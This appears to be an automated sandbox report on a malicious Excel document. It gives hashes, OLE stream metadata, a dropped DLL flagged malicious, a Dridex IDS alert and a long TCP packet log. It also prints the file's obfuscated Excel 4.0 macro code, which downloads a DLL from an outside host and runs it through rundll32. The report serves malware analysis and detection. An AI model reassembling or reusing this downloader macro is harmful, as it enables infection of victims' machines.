                                                    Size (bytes):164316
                                                    Entropy (8bit):6.404543028003528
                                                    Encrypted:false
                                                    SSDEEP:3072:eF8rmdAItyzElBIL6lECbgBGGP5xLm7Tjw5bSjze2iNW2MmtJI7QExMmtiEUEoFG:48rmdAItyzElBIL6lECbgBvP5Nm7Tjwc
                                                    MD5:45F873A63562D99B6CCC3CCA80975936
                                                    SHA1:C84FC25F4EE80B0C195F5C710FDBAD7B65070EFE
                                                    SHA-256:D9F09747AC993C5DF93BE887764D79C2456C67AAD6B7FA078C9DF0A471319C34
                                                    SHA-512:38689D95BEDE8C9D436189EADBBD6E96F94FB5AAEFADA553188500E2BD08713280E93AD0DDE20C2991432F3B99D50CC4244B3E9C9EB336B0DD062F87865BD149
                                                    Malicious:false
                                                    Preview: ........g2..........................\.p....user B.....a.........=...............................................=.....i..9..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...........
                                                    C:\Users\user\ndgfht.frg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1058304
                                                    Entropy (8bit):6.53535499133489
                                                    Encrypted:false
                                                    SSDEEP:24576:5hHy+lLB10y0hvDP3PnlFnIOAVMeuaBAvRSM4eja:5hJl9N0hrHnlFnIOADAvRYB
                                                    MD5:C5DF0AA6752CBADA9CC1461F1AE6B64C
                                                    SHA1:17C84C667875594B0285B7412D0BE37FD05CD504
                                                    SHA-256:997428256801049343CE5926CE4652FA0D74E4AB6A93C809C8CC385DEC620123
                                                    SHA-512:21E383BFC558F0B05239A00DE59AD99F631226533AFC9D73F251EEA26754936931BF19BE7F9945800702AA4CDB5AFEC503740AA40AD72E9C96FC72E0DB943A7D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........E.........E.......E.......E.............................m........6...T......T......T......T......Rich...........PE..L...X.\...........!.....8...........D.......P.......................................=....@.........................`z.......z..d........v.......................k......T...............................@............P..,............................text...C7.......8.................. ..`.rdata..F>...P...@...<..............@..@.data................|..............@....rsrc....v.......x...B..............@..@.reloc...k.......l..................@..B........................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: Windows User, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Apr 7 13:38:33 2021, Security: 0
                                                    Entropy (8bit):3.202085554218189
                                                    TrID:
                                                    • Microsoft Excel sheet (30009/1) 78.94%
                                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                    File name:Documents_460000622_1464906353.xls
                                                    File size:291840
                                                    MD5:bcd540201ec5e0301816d194bb15ec30
                                                    SHA1:e5ca3f6cbb69736c904ff77f7ab6514fc48153a3
                                                    SHA256:a83ce7af997c7514b9faa386fde353ce094e7ef5bfc31dfb52dc9f5d7cfee43e
                                                    SHA512:51904ad2d3d789b7855b2499e3917a0d8b5ba31acf7120763ef3a10b11855b5312ca92c7f96d0893acd8b014b06510f0ec2c0c72430159575106b2c9dc2645c4
                                                    SSDEEP:6144:46tIrWqoY5O3vuVULCc9u/vRTP8RXToK+dmXaU:JxaU
                                                    File Content Preview:........................>.......................8...........................3...4...5...6...7..................................................................................................................................................................

                                                    File Icon

                                                    Icon Hash:e4eea286a4b4bcb4

                                                    Static OLE Info

                                                    General

                                                    Document Type:OLE
                                                    Number of OLE Files:1

                                                    OLE File "Documents_460000622_1464906353.xls"

                                                    Indicators

                                                    Has Summary Info:True
                                                    Application Name:Microsoft Excel
                                                    Encrypted Document:False
                                                    Contains Word Document Stream:False
                                                    Contains Workbook/Book Stream:True
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:
                                                    Flash Objects Count:
                                                    Contains VBA Macros:True

                                                    Summary

                                                    Code Page:1252
                                                    Last Saved By:Windows User
                                                    Create Time:2006-09-16 00:00:00
                                                    Last Saved Time:2021-04-07 12:38:33
                                                    Creating Application:Microsoft Excel
                                                    Security:0

                                                    Document Summary

                                                    Document Code Page:1252
                                                    Thumbnail Scaling Desired:False
                                                    Contains Dirty Links:False

                                                    Streams

                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                    General
                                                    Stream Path:\x5DocumentSummaryInformation
                                                    File Type:data
                                                    Stream Size:4096
                                                    Entropy:0.35273196153
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . . E x c e l 4 . 0 M a c r o s . . . . . . . . . . . .
                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 89 00 00 00 02 00 00 00 e4 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                    General
                                                    Stream Path:\x5SummaryInformation
                                                    File Type:data
                                                    Stream Size:4096
                                                    Entropy:0.272742285417
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . X . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . W i n d o w s U s e r . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . * . . . + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 90 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 58 00 00 00 0c 00 00 00 70 00 00 00 0d 00 00 00 7c 00 00 00 13 00 00 00 88 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 10 00 00 00 57 69 6e 64 6f 77 73 20
                                                    Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 279643
                                                    General
                                                    Stream Path:Book
                                                    File Type:Applesoft BASIC program data, first line number 8
                                                    Stream Size:279643
                                                    Entropy:3.18536385559
                                                    Base64 Encoded:True
                                                    Data ASCII:. . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . W i n d o w s U s e r B . . . . . . . . . . . . . . . . . . . . . . . D o c s 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 . . 8 . . . . . . . X
                                                    Data Raw:09 08 08 00 00 05 05 00 0a 54 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 0c 57 69 6e 64 6f 77 73 20 55 73 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                    Macro 4.0 Code

                                                    =ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=EXEC('Docs 3'!BP86&'Docs 3'!BP87&'Docs 3'!BO97&'Docs 3'!BO98&'Docs 3'!BR66&'Docs 3'!BR86&'Docs 3'!BR87&'Docs 3'!BT94&'Docs 3'!BR103&'Docs 3'!BT101)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)='Docs 3'!BA19()
                                                    ,,,,,,ht,,,,,,tps://,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=FORMULA(BJ10&BJ11&'Docs 3'!BI37&'Docs 3'!BI38,BJ8)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)",,,,,,"=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=ATAN(24672416276127600)=ASIN(241626421642164000000)=ACOS(2.74657246527642E+24)=CALL(""U""&'Docs 3'!BQ77&'Docs 3'!BM72&""L""&'Docs 3'!BM73&'Docs 3'!BO73,""UR""&'Docs 3'!BT72&'Docs 3'!BT73&'Docs 3'!BU71&'Docs 3'!BS80&'Docs 3'!BS81,'Docs 3'!BU77&'Docs 3'!BU84,0,BJ8,'Docs 3'!BR66,0,0)='Docs 1'!AR25()",,,,,,
                                                    =HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,whiskyexpanse.com/ke/ohior.,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\ndgfht.frg,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,nload,,,,,,,,,,,,R,,,,,,,,,,,,,,,,,,,,Mo,,n,,,,,LDow,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ToFil,,,,,,,,,,,,,,,,,,,,eA,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,,",Pl",,,,,,,,,,,,,,,,,,u,,ugi,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,nI,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ndl,,,,,,,,,,,,,,,,,,,,l32 ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,it,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    04/07/21-18:47:53.102805TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434917052.12.4.186192.168.2.22

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Apr 7, 2021 18:47:18.377865076 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:18.469909906 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:18.470122099 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:18.479497910 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:18.571708918 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:18.575726986 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:18.575788021 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:18.575849056 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:18.575891018 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:18.592698097 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:18.686321020 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:18.686815977 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:18.686868906 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:18.970978975 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.062788963 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.239533901 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.239584923 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.239622116 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.239650011 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.239675999 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.239715099 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.239742994 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.239764929 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.239816904 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.239826918 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.239834070 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.240355968 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.240389109 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.240458965 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.240489960 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.241555929 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.241626978 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.241698027 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.241822004 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.243746996 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.243788958 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.243948936 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.245755911 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.245806932 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.245882988 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.245932102 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.248019934 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.248048067 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.248119116 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.248164892 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.260421038 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.312257051 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.312293053 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.312510014 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.312722921 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.312791109 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.312800884 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.312856913 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.315057039 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.315093040 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.315179110 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.317131996 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.317171097 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.317218065 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.317246914 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.320336103 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.320369005 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.320453882 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.321410894 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.321526051 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.321531057 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.321587086 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.323760033 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.323796034 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.323838949 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.323865891 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.325587988 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.325642109 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.325664043 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.325696945 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.331682920 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.331720114 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.331888914 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.332788944 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.332850933 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.332894087 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.332945108 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.335443974 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.335474968 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.335551023 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.336894989 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.336955070 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.397053957 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.397092104 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.397334099 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.397589922 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.397618055 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.397665977 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.397691965 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.398617983 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.398648977 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.398695946 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.398722887 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.400782108 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.400810957 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.400863886 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.402975082 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.403017044 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.403124094 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.403173923 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.405214071 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.405255079 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.405344963 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.405392885 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.407308102 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.407344103 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.407450914 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.407496929 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.409429073 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.409528017 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.409584999 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.409609079 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.411607981 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.411645889 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.411711931 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.411736012 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.413810968 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.413863897 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.413912058 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.415898085 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.415951014 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.415992975 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.416009903 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.416014910 CEST49167443192.168.2.22104.21.3.47
                                                    Apr 7, 2021 18:47:19.418042898 CEST44349167104.21.3.47192.168.2.22
                                                    Apr 7, 2021 18:47:19.418107986 CEST44349167104.21.3.47192.168.2.22
